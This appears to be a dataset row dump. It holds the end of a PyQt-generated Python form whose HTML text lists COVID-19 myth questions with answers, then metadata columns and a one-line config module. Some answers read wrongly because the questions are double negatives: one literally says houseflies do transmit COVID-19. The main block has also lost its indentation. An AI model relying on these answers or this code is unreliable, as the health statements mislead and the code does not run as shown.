"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">26. Can Thermal scanners NOT detect COVID-19?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->Thermal scanner detects only one of the symptoms of the covid but not the whole disease.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">27. Does Adding pepper to your soup or other meals NOTprevent or cure COVID-19?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->No connection between adding pepper to soup and covid.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">28. Is COVID-19 NOT transmitted through houseflies?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->No, it is not.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">29. Do 5G mobile networks NOT spread COVID-19?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->There is no connections between covid and network.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">30. Does Catching COVID-19 NOT mean you will have it for life?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->Yes, it is not remain with you for life.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p></body></html>"))
import resources_rc
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Form = QtWidgets.QWidget()
ui = Ui_Form()
ui.setupUi(Form)
Form.show()
sys.exit(app.exec_())
| 96.277778
| 419
| 0.689267
| 5,391
| 34,660
| 4.419032
| 0.090521
| 0.107669
| 0.047853
| 0.071779
| 0.775889
| 0.758679
| 0.74533
| 0.740797
| 0.730974
| 0.714016
| 0
| 0.038936
| 0.096711
| 34,660
| 359
| 420
| 96.545961
| 0.721988
| 0.007934
| 0
| 0.44898
| 1
| 0.055394
| 0.331443
| 0.052477
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005831
| false
| 0.005831
| 0.008746
| 0
| 0.017493
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
eb3a4a59e6b2621ee019384ad58926b119852e1b
| 44
|
py
|
Python
|
L3A_Physical/pytorch/config/__init__.py
|
MingjieWang0606/L3A
|
6f01482826f27246a762cadf57f54906e14135e4
|
[
"MIT"
] | 34
|
2021-07-30T22:19:17.000Z
|
2022-03-24T03:49:19.000Z
|
L3A_Physical/pytorch/config/__init__.py
|
MingjieWang0606/L3A
|
6f01482826f27246a762cadf57f54906e14135e4
|
[
"MIT"
] | 6
|
2021-08-31T08:27:07.000Z
|
2022-03-28T09:20:11.000Z
|
L3A_Physical/pytorch/config/__init__.py
|
MingjieWang0606/L3A
|
6f01482826f27246a762cadf57f54906e14135e4
|
[
"MIT"
] | 9
|
2021-08-16T07:24:43.000Z
|
2022-01-27T02:36:57.000Z
|
from .config import * #pylint: disable=W0401
| 44
| 44
| 0.772727
| 6
| 44
| 5.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 0.113636
| 44
| 1
| 44
| 44
| 0.769231
| 0.477273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.